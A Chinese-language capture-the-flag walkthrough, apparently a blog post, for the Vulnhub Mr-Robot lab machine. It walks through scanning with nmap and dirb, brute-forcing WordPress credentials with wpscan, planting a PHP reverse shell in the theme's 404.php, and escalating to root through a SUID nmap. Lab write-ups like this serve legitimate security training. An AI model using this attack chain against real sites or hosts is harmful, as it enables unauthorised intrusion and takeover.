看完这篇教你玩转靶机 MR-ROBOT: 1
Vulnhub介绍:Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。靶机下载:官网:https://download.vulnhub.com/mrrobot/mrRobot.ova
Vulnhub介绍:
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。
靶机下载:
官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
废话不多说直接进入正题:
1.arp-scan -l (我是内网nat扫描嗷,有桥接需求的可以直接输入netdiscover进行扫描)
2.nmap -sS -A -p- -n +靶机ip
3.dirb http://+靶机ip
4.访问robots.txt网页
就会发现一个txt和一个dic
我们访问txt得到第一个flag
5.访问另一个dic并下载它
查看它发现它可能是个字典
6.dirb http://+靶机ip(可以不用再扫一次翻到上面扫过的直接访问wp页面,我懒得翻又扫了一次)
访问wp-admin页面
弱密码访问发现并无效果
点击"lost your password"(底下灰色的东东看到了吗!!!)
随便输入一个用户名进行抓包
爆出用户名Elliot
7.nikto -h +靶机ip
发现有大量wp信息
所以我们接下来用wpscan爆破密码没有那么慢,上面的用户名已经被我们爆出来了,所以大可不必再用抓包来爆真的慢!!
wpscan --url http://+靶机ip -U elliot -P fsocity.dic
密码:ER28-0652
(爆破出来需要一个小时呜呜呜呜学校机子差飞了)
8.利用php反弹shell
cd /usr/share/webshells/php
cat php-reverse-shell.php
复制它粘贴到404.php并将ip改为本地ip还有端口,开启监听
然后访问http://+ip/wp-admin/404.php
让我们回到终端你发现你进去了
神奇吧
哈哈哈哈
这里有第二个key
可读需要解密
解密结果:abcdefghijklmnopqrstuvwxyz
9.切换身份读取key2
优化终端
python -c ‘import pty;pty.spawn(“/bin/sh”)’
提权
find / -perm -4000 2>/dev/null (查找有SUID权限的文件)
这里发现有nmap可以提权我们用它进行提权
nmap -v
nmap --interactive
!sh
id
find / -name key-3-of-3.txt
cd /root/key-3-of-3.txt
cat key-3-of-3.txt 其实正确查看方式应该为cat key*
到这里就完成啦好玩吧!!!
更多推荐
所有评论(0)